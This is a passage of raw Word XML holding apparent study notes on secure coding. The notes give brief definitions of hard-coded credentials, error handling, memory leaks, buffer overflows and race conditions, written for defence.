        </w:rPr>
        <w:t xml:space="preserve"> says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2955AB" w14:textId="10988A8A" w:rsidR="008C3EB2" w:rsidRDefault="008C3EB2" w:rsidP="008C3EB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Elasticity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes a step further and says apps should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when it is no longer needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771EA631" w14:textId="2D7D811D" w:rsidR="004F4A30" w:rsidRPr="001A77C8" w:rsidRDefault="004F4A30" w:rsidP="004F4A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Secure Coding Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E3AA2" w14:textId="159722FE" w:rsidR="004F4A30" w:rsidRDefault="00ED2896" w:rsidP="004F4A3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 general, no matter what coding language you use, security practices are the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3081D8" w14:textId="634DB88A" w:rsidR="00ED2896" w:rsidRPr="001A77C8" w:rsidRDefault="00CD5277" w:rsidP="004F4A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Source Code Comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F3548" w14:textId="50392751" w:rsidR="00CD5277" w:rsidRDefault="002B2B78" w:rsidP="00CD527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Code comments obviously tell how code works but can be dangerous when in the wrong hands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7001CEC5" w14:textId="72EC0B89" w:rsidR="002B2B78" w:rsidRDefault="002B2B78" w:rsidP="002B2B7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This is not a problem for compiled code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22290F73" w14:textId="2B3A21A2" w:rsidR="002B2B78" w:rsidRDefault="00B2008D" w:rsidP="002B2B7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However, web applications that expose their code may allow remote users to view comments left in the code</w:t>
      </w:r>
      <w:r w:rsidR="00687041">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7117C6FE" w14:textId="61690882" w:rsidR="00687041" w:rsidRDefault="00687041" w:rsidP="00687041">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Thus, they should be removed in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415C0F5" w14:textId="094BD099" w:rsidR="00687041" w:rsidRPr="001A77C8" w:rsidRDefault="00687041" w:rsidP="00687041">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4CB71" w14:textId="63E1A5DA" w:rsidR="00687041" w:rsidRDefault="000201B9" w:rsidP="0068704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Attackers throve on exploiting errors in code a</w:t>
      </w:r>
      <w:r w:rsidR="006B79B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nd unresolved errors may expose code to a lot of risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F810D31" w14:textId="69A8C6A6" w:rsidR="006B79B6" w:rsidRDefault="006B79B6" w:rsidP="006B79B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be used</w:t>
      </w:r>
      <w:r w:rsidR="0084271B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that if an error does happen, it doesn’t create any problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B28DFF" w14:textId="54AB46ED" w:rsidR="009D2F8D" w:rsidRDefault="009D2F8D" w:rsidP="009D2F8D">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However, too much error handling, like providing viewable logs about the error, may give away too much information about the inner workings of the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB55DDF" w14:textId="133F98BC" w:rsidR="0084271B" w:rsidRPr="001A77C8" w:rsidRDefault="007E5820" w:rsidP="0084271B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hard-Coded Credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A7626" w14:textId="677F2802" w:rsidR="007E5820" w:rsidRDefault="00AE6A34" w:rsidP="007E582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This is when </w:t>
      </w:r>
      <w:r w:rsidR="00EC0E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>developers hard code usernames and passwords into the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0295CD" w14:textId="3FE08758" w:rsidR="00EC0E6F" w:rsidRDefault="00EC0E6F" w:rsidP="00EC0E6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First reason may be </w:t>
      </w:r>
      <w:r w:rsidR="00AA2A2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">used as a </w:t>
      </w:r>
      <w:r w:rsidR="00AA2A2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>backdoor</w:t>
      </w:r>
      <w:r w:rsidR="00AA2A2C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for developers to log on to any distribution of the code </w:t>
      </w:r>
      <w:r w:rsidR="002D42DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in case something fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75567615" w14:textId="1863CC3C" w:rsidR="002D42DF" w:rsidRDefault="002D42DF" w:rsidP="002D42DF">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This is problematic as if the password and username is discovered, it is applicable to all code distributions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A7421" w14:textId="67D6B665" w:rsidR="002D42DF" w:rsidRDefault="002D42DF" w:rsidP="002D42D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lastRenderedPageBreak/>
        <w:t>Second reas</w:t>
      </w:r>
      <w:r w:rsidR="000472DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>on may be if the access credentials for other services like a database is within the source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EAC86C" w14:textId="093A74C6" w:rsidR="00670E76" w:rsidRDefault="00670E76" w:rsidP="00670E76">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If these credentials ever get discovered, it’s the same problem as the backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F040C8" w14:textId="7DDBA685" w:rsidR="00670E76" w:rsidRPr="001A77C8" w:rsidRDefault="001604DD" w:rsidP="001604DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memory Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B217216" w14:textId="50BFED9B" w:rsidR="001604DD" w:rsidRDefault="001604DD" w:rsidP="001604D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Poor memory management practices can undermine the security of an entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B57B1C" w14:textId="072A17CE" w:rsidR="001604DD" w:rsidRPr="001A77C8" w:rsidRDefault="007E6A64" w:rsidP="001604DD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resource Exhaustion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50716746" w14:textId="51EC2A00" w:rsidR="007E6A64" w:rsidRDefault="004403AB" w:rsidP="007E6A6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When the system consumes all of the memory, storage, processing time, or other resources, rendering the system disabled or crippled for other uses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E435392" w14:textId="27E4D356" w:rsidR="008E05E4" w:rsidRDefault="008E05E4" w:rsidP="007E6A64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memory Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008561EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is an example, where memory fails to be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7327DF79" w14:textId="3A7371DC" w:rsidR="008561EA" w:rsidRPr="001A77C8" w:rsidRDefault="008561EA" w:rsidP="008561EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pointer De-referencing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F746C2" w14:textId="605D6DE3" w:rsidR="008561EA" w:rsidRDefault="00DD5155" w:rsidP="008561EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Memory Pointers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can cause security issues</w:t>
      </w:r>
      <w:r w:rsidR="00186BB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as if pointers are not handled correctly, like </w:t>
      </w:r>
      <w:r w:rsidR="005C6293">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>trying to dereference a null pointer, a crash will happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BB47ED" w14:textId="65C8D604" w:rsidR="005C6293" w:rsidRDefault="005C6293" w:rsidP="005C6293">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Crashes can potentially give attackers in</w:t>
      </w:r>
      <w:r w:rsidR="00F23CF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sight of how an application works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEE4292" w14:textId="0B117074" w:rsidR="00F23CF7" w:rsidRDefault="00F23CF7" w:rsidP="005C6293">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In the worst case, a null pointer exception may allow an attacker to bypass security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECA3678" w14:textId="01AE2B1C" w:rsidR="00F23CF7" w:rsidRPr="001A77C8" w:rsidRDefault="00F23CF7" w:rsidP="00F23CF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buffer Overflows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EE313" w14:textId="71D2ED7A" w:rsidR="00F23CF7" w:rsidRDefault="000114D5" w:rsidP="00F23CF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buffer overflow attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> occur when an attacker manipulates a program into placing more data into an area of memory than is allocated for that program’s use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CCACAE" w14:textId="2C8437A7" w:rsidR="005772CC" w:rsidRDefault="005772CC" w:rsidP="005772CC">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The goal is to </w:t>
      </w:r>
      <w:r w:rsidR="008E058D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>overwrite other information in memory with instructions that may be executed by a different process running on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C205A5B" w14:textId="25BCBDF7" w:rsidR="008E058D" w:rsidRDefault="00BA5D6D" w:rsidP="00BA5D6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These attacks are quite commonplace and tend to persist for many years after they are initially discovered. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69563C0C" w14:textId="6F4BD876" w:rsidR="009E5E77" w:rsidRDefault="009E5E77" w:rsidP="00BA5D6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Finding out if a program is </w:t>
      </w:r>
      <w:r w:rsidR="00A6152D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a buffer overflow can </w:t>
      </w:r>
      <w:r w:rsidR="00A6152D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>be as simple as a vulnerability scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776A5DD" w14:textId="1ED2CFFC" w:rsidR="00A6152D" w:rsidRPr="001A77C8" w:rsidRDefault="0099520C" w:rsidP="0099520C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Race Conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439500A2" w14:textId="1AAE5241" w:rsidR="0099520C" w:rsidRDefault="00EF2275" w:rsidP="0099520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Occur when the security code </w:t>
      </w:r>
      <w:r w:rsidR="00123E92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>segment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> depends upon the sequence of events occurring within the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC157DF" w14:textId="055C09E8" w:rsidR="00123E92" w:rsidRDefault="00123E92" w:rsidP="00123E92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Time-of-Check-to-Time-of-Use (TOCTTOU</w:t>
      </w:r>
      <w:r w:rsidR="00533680">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or TOC/TOU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00533680">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DAF2E8" w14:textId="3DA5B8AA" w:rsidR="00533680" w:rsidRDefault="00533680" w:rsidP="0053368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 race condition that occurs when a program checks access permissions too far in advance of a resource request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29C910" w14:textId="10975C8A" w:rsidR="00F40309" w:rsidRDefault="003C732A" w:rsidP="003C732A">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If </w:t>
      </w:r>
      <w:r w:rsidR="00E60440">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin revokes permission of a user onto a </w:t>
      </w:r>
      <w:r w:rsidR="008261B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>system by caching it in a login permission list, if the user is still logged in, they can maintain normal permissions until they log off.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9B67DD" w14:textId="70587AFF" w:rsidR="008261B5" w:rsidRPr="001A77C8" w:rsidRDefault="008261B5" w:rsidP="008261B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unprotected APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202821F7" w14:textId="2A424637" w:rsidR="008261B5" w:rsidRDefault="00C20B3C" w:rsidP="008261B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Application Program Interfaces (APIs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow </w:t>
      </w:r>
      <w:r w:rsidR="00A105D2">
